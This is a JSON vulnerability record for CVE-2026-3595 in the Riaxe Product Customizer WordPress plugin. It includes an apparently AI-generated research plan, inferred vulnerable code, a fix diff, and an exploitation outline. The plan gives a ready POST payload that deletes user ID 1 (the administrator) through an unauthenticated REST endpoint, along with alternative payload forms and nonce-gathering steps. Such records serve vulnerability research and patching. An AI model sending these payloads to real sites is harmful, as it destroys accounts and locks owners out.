[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdMEBJRyCKtX81mOgcOHAimyfQh0T-DB4ixgolU7J50E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3595","riaxe-product-customizer-unauthenticated-arbitrary-user-deletion-via-userid-parameter","Riaxe Product Customizer \u003C= 2.1.2 - Unauthenticated Arbitrary User Deletion via 'user_id' Parameter","The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer without a permission_callback, causing WordPress to default to allowing unauthenticated access, and the inkxe_delete_customer() callback function taking an array of user IDs from the request body and passing each one directly to wp_delete_user() without any authentication or authorization checks. This makes it possible for unauthenticated attackers to delete arbitrary WordPress user accounts, including administrator accounts, leading to complete site lockout and data loss.","riaxe-product-customizer",null,"\u003C=2.1.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-15 16:45:25","2026-04-16 05:29:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F59da92e2-9ea0-4566-ae4d-3d5d91d0e42e?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-3595**, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions up to 2.1.2) registers a REST API route `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer` without providing a `permission_callback`. In WordPress REST API registration, an absent or improperly defined `permission_callback` allows the endpoint to be accessed by unauthenticated users. The callback function associated with this route, `inkxe_delete_customer()`, accepts an array of user IDs from the request body and passes them directly to the core WordPress function `wp_delete_user()` without any identity verification or capability checks.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `POST \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **Namespace\u002FRoute:** `InkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **Method:** `POST`\n* **Vulnerable Parameter:** `user_id` (expected as an array\u002Flist of integers)\n* **Authentication:** None required (Unauthenticated).\n* **Preconditions:** The plugin must be active. The attacker needs to know or guess the ID of the user they wish to delete (e.g., ID `1` is almost always the initial administrator).\n\n### 3. Code Flow (Inferred)\n1. **Route Registration:** The plugin uses the `rest_api_init` hook to register the route.\n ```php\n \u002F\u002F Inferred registration logic\n register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n \u002F\u002F Missing 'permission_callback'\n ));\n ```\n2. **Request Handling:** When a `POST` request is sent to the endpoint, WordPress dispatches it to `inkxe_delete_customer($request)`.\n3. **Vulnerable Callback:**\n ```php\n function inkxe_delete_customer($request) {\n $params = $request->get_json_params(); \u002F\u002F or get_params()\n $user_ids = $params['user_id']; \n \u002F\u002F Logic likely iterates through $user_ids and calls:\n foreach ($user_ids as $id) {\n wp_delete_user($id);\n }\n }\n ```\n4. **Sink:** `wp_delete_user()` executes, removing the user from the database.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint lacks a `permission_callback`, which typically means it is publicly accessible. In the WordPress REST API, unauthenticated (public) endpoints usually do **not** require a `_wpnonce` or `X-WP-Nonce` header unless the site has specific global restrictions.\n\n**Strategy:** \n1. First attempt the exploit **without** a nonce.\n2. If the server returns a `403 Forbidden` with a \"rest_cookie_invalid_nonce\" error, the agent should attempt to obtain a REST nonce.\n * **Action String:** `wp_rest`\n * **Acquisition Method:**\n 1. Navigate to the site's homepage or any public page.\n 2. Use `browser_eval` to check if a nonce is localized. Common keys: `window.wpApiSettings.nonce`.\n 3. Alternatively, check the HTML source for `_wpnonce` in scripts.\n\n### 5. Exploitation Strategy\nThe goal is to delete a specific user (e.g., the primary administrator with ID 1).\n\n* **Target URL:** `http:\u002F\u002F\u003Ctarget-site>\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer`\n* **HTTP Method:** `POST`\n* **Content-Type:** `application\u002Fjson`\n* **Payload:**\n ```json\n {\n \"user_id\": [1]\n }\n ```\n\n**Step-by-step Plan:**\n1. **Discovery:** Verify the endpoint exists by sending a `GET` request to `\u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002F`. If it returns a 404, the plugin may not be active or the namespace differs.\n2. **Execution:** Use the `http_request` tool to send the `POST` payload.\n3. **Cleanup:** No cleanup is possible as the user is deleted.\n\n### 6. Test Data Setup\nTo safely verify this without locking yourself out:\n1. Create a \"Victim\" user with Administrator privileges via WP-CLI:\n `wp user create victim victim@example.com --role=administrator --user_pass=password123`\n2. Note the ID of the created user:\n `wp user list --field=ID --user_login=victim` (Let's assume the ID is `2`).\n3. The exploit will target user ID `2`.\n\n### 7. Expected Results\n* **Successful Exploit:** The server returns `200 OK` or `204 No Content`.\n* **Plugin Behavior:** The user record associated with the provided ID is permanently removed from the `wp_users` and `wp_usermeta` tables.\n* **Site Impact:** If an admin is deleted, they can no longer log in.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the deletion using WP-CLI:\n1. Check if the user still exists:\n `wp user get 2`\n2. Expected output: `Error: Invalid user ID, email or login: '2'`\n3. Alternatively, list all users to ensure the ID is missing:\n `wp user list`\n\n### 9. Alternative Approaches\nIf a JSON payload fails, the plugin might be expecting standard URL-encoded form data.\n* **Alternative Payload (Form-encoded):**\n * **Method:** `POST`\n * **Content-Type:** `application\u002Fx-www-form-urlencoded`\n * **Body:** `user_id[]=2`\n* **Alternative Parameter Structure:**\n * Try passing a single integer instead of an array: `{\"user_id\": 2}`.\n * Try passing the ID as a string within the array: `{\"user_id\": [\"2\"]}`.","The Riaxe Product Customizer plugin registers a REST API endpoint for deleting customers that lacks a 'permission_callback', allowing unauthenticated access. The associated callback function, 'inkxe_delete_customer', accepts an array of user IDs from the request and deletes them via 'wp_delete_user()' without any identity verification. This allows unauthenticated attackers to delete arbitrary users, including administrators, potentially locking legitimate owners out of the site.","\u002F\u002F Inferred registration within the plugin's REST API initialization logic\nregister_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n \u002F\u002F Missing 'permission_callback' allows unauthenticated access\n));\n\n---\n\n\u002F\u002F Inferred callback function handling the deletion\nfunction inkxe_delete_customer($request) {\n $user_ids = $request->get_param('user_id');\n if (is_array($user_ids)) {\n foreach ($user_ids as $id) {\n \u002F\u002F Vulnerable sink: deleting users without authorization checks\n wp_delete_user($id);\n }\n }\n}","--- a\u002Finc\u002Fclass-inkxe-rest-api.php\n+++ b\u002Finc\u002Fclass-inkxe-rest-api.php\n@@ -10,6 +10,9 @@\n register_rest_route('InkXEProductDesignerLite', '\u002Fcustomer\u002Fdelete_customer', array(\n 'methods' => 'POST',\n 'callback' => 'inkxe_delete_customer',\n+ 'permission_callback' => function () {\n+ return current_user_can('delete_users');\n+ }\n ));","The exploit targets the public REST API endpoint at \u002Fwp-json\u002FInkXEProductDesignerLite\u002Fcustomer\u002Fdelete_customer. An unauthenticated attacker sends a POST request with a JSON payload containing a 'user_id' parameter, which must be an array of integers representing the target WordPress user IDs (e.g., ID 1 for the primary administrator). Because the endpoint lacks a permission_callback, the request is executed by the server, and the inkxe_delete_customer function iterates through the provided IDs, calling the core wp_delete_user function on each, resulting in permanent account deletion without any credential verification.","gemini-3-flash-preview","2026-04-16 15:27:54","2026-04-16 15:28:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]